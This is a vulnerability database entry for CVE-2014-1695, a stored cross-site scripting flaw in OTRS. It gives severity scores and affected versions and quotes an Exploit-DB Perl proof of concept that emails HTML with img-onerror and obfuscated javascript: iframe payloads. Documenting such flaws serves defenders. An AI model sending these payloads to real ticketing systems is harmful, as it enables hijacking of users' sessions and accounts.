CVE-2014-1695 : Detail

CVE-2014-1695

Cross-site Scripting
A03-Injection
2.25%V3
Network
2014-02-28
16h00 +00:00
2015-05-04
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 36842

Publication date : 2015-04-26 22h00 +00:00
Author : Adam Ziaja
EDB Verified : No

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS # Date: 28.01.2014 # Exploit Author: Adam Ziaja http://adamziaja.com # Vendor Homepage: https://www.otrs.com # Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 # CVE : CVE-2014-1695 #!/usr/bin/perl -w use strict; use MIME::Lite; my $msg = MIME::Lite->new( Subject => 'OTRS XSS PoC', From => '[email protected]', To => '[email protected]', Type => 'text/html', Data => '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>' ); $msg->send();

Products Mentioned

Configuraton 0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.0

Otrs>>Otrs >> Version 3.3.1

Otrs>>Otrs >> Version 3.3.2

Otrs>>Otrs >> Version 3.3.3

Otrs>>Otrs >> Version 3.3.4

Configuraton 0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.0

Otrs>>Otrs >> Version 3.2.1

Otrs>>Otrs >> Version 3.2.2

Otrs>>Otrs >> Version 3.2.3

Otrs>>Otrs >> Version 3.2.4

Otrs>>Otrs >> Version 3.2.5

Otrs>>Otrs >> Version 3.2.6

Otrs>>Otrs >> Version 3.2.7

Otrs>>Otrs >> Version 3.2.8

Otrs>>Otrs >> Version 3.2.9

Otrs>>Otrs >> Version 3.2.10

Otrs>>Otrs >> Version 3.2.14

Configuraton 0

Otrs>>Otrs >> Version 3.1.0

Otrs>>Otrs >> Version 3.1.1

Otrs>>Otrs >> Version 3.1.2

Otrs>>Otrs >> Version 3.1.3

Otrs>>Otrs >> Version 3.1.4

Otrs>>Otrs >> Version 3.1.5

Otrs>>Otrs >> Version 3.1.6

Otrs>>Otrs >> Version 3.1.7

Otrs>>Otrs >> Version 3.1.8

Otrs>>Otrs >> Version 3.1.9

Otrs>>Otrs >> Version 3.1.10

Otrs>>Otrs >> Version 3.1.11

Otrs>>Otrs >> Version 3.1.13

Otrs>>Otrs >> Version 3.1.14

Otrs>>Otrs >> Version 3.1.15

Otrs>>Otrs >> Version 3.1.16

Otrs>>Otrs >> Version 3.1.17

Otrs>>Otrs >> Version 3.1.18

Otrs>>Otrs >> Version 3.1.19

References

https://www.exploit-db.com/exploits/36842/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/65844
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/57018
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/103781
Tags : vdb-entry, x_refsource_OSVDB